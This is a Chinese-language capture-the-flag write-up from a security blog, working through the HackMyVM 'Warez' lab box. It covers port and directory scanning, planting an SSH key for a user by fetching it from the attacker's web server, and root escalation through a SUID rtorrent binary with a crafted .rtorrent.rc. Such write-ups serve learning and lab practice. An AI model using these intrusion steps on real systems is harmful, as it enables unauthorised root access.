freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

记一次hackmyvm综合靶场的渗透测试-warez
知非 2022-04-27 09:52:39 122756
所属地 黑龙江省

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

信息收集阶段

下载地址:https://hackmyvm.eu/machines/machine.php?vm=Warez

靶机ip:192.168.1.55

kali IP:192.168.1.3

导入镜像:

1651024081_6268a0d1e7f90fc42018f.png!small?1651024082473

扫描同网段地址:

1651024088_6268a0d851eed30e7849a.png!small?1651024088772

发现IP地址,详细扫描!开放了22端口和80端口

sudo nmap -v -T4 -p- -A -oN nmap.log 192.168.1.55

1651024097_6268a0e1953823aaa4b32.png!small?1651024098115

访问下80端口试一下!这个东西!

1651024109_6268a0ed8dbb6a8b30c64.png!small?1651024110029

可能被利用位置。好像有一个用户叫做carolina

1651024118_6268a0f6819f9fdc99bfe.png!small?1651024118935

接下来,进行目录扫描!

gobuster dir -u http://192.168.1.55/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt

1651024135_6268a1070792f58e69745.png!small?1651024135556

访问以下,试试!!!

1651024139_6268a10b7b5e2fb7a6767.png!small?1651024139894

指向:results.txt

1651024145_6268a111502c5ad085078.png!small?1651024145686

1651024150_6268a116520782a4b1a6e.png!small?1651024150772

像是登录日志:

1651024155_6268a11b690894b0f94a1.png!small?1651024156073

漏洞利用阶段

这里提示我们有一个用户是carolina,那我们是不是可以将 公钥进行上传啊!

这里可以采用putty-puttygen生成公钥文件,在将公钥文件上传到被测主机上!

这是就可以采用公钥文件进行ssh连接,就不用输入用户名和密码了!

把生成的文件拷贝到:

cp id_rsa.pub /root/.ssh/ 公钥

cp id_rsa /root/.ssh/ 私钥

cp ~/.ssh/id_rsa.pub /root/authorized_keys

也可以通过本地生成公钥和私钥:

ssh-keygen -t rsa 三次回车

于是在kali上开启web服务:

python3 -m http.server 6666

在界面通过下载方式下载公钥!!!

http://192.168.1.3:6666/authorized_keys

/home/carolina/.ssh

1651024162_6268a122303da16c5dca4.png!small?1651024162655

1651024195_6268a143a447e61042d54.png!small?1651024196024

下载成功!!!!

于是我们进行ssh进行连接!

ssh carolina@192.168.1.55

1651024203_6268a14ba59624b3759ba.png!small?1651024204140

1651024208_6268a150be02fefc2a643.png!small?1651024209267

第一个flag文件:H****ing

权限提升阶段

接下来就是需要获取root权限:

这里需要增加一个知识:SUID提权!!!

SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。

我们查询下,那些文件拥有这些权限:

find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

1651024227_6268a16334094babe77b3.png!small?1651024227681

因此,这里需要查询以下如何通过rtorrent执行系统命令,我们需要用到他的配置文件!!!

https://blog.csdn.net/AloneSword/article/details/47067333?locationNum=14

1651024231_6268a167c0a3535e2b39f.png!small?1651024232406

vi .rtorrent.rc

增加内容:

execute.throw = mkdir, /root/.ssh

execute.throw = cp, /home/carolina/.ssh/authorized_keys,  /root/.ssh/authorized_keys(配置文件中不能有空格)

cat .rtorrent.rc

然后使用rtorrent & 进行执行文件,接着使用ssh登录到root

1651024239_6268a16f621e2a0d0a9f8.png!small?1651024239806

1651024243_6268a173ea5c1161ed3d1.png!small?1651024244469

得到最终的flag!!!

HM****ng

# 渗透测试 # web安全 # 网络安全技术 # 靶场平台 # 靶场实战
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 知非 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
hackmyvm靶场实战
知非 LV.8
这家伙太懒了,还未填写个人描述!
  • 125 文章数
  • 40 关注者
一个月学习通过商用密码测评师的经验分享
2025-01-09
等保2.0之AIX安全计算环境测评指导书
2023-05-10
记一次hackmyvm综合靶场的渗透测试-vulny
2022-04-27
文章目录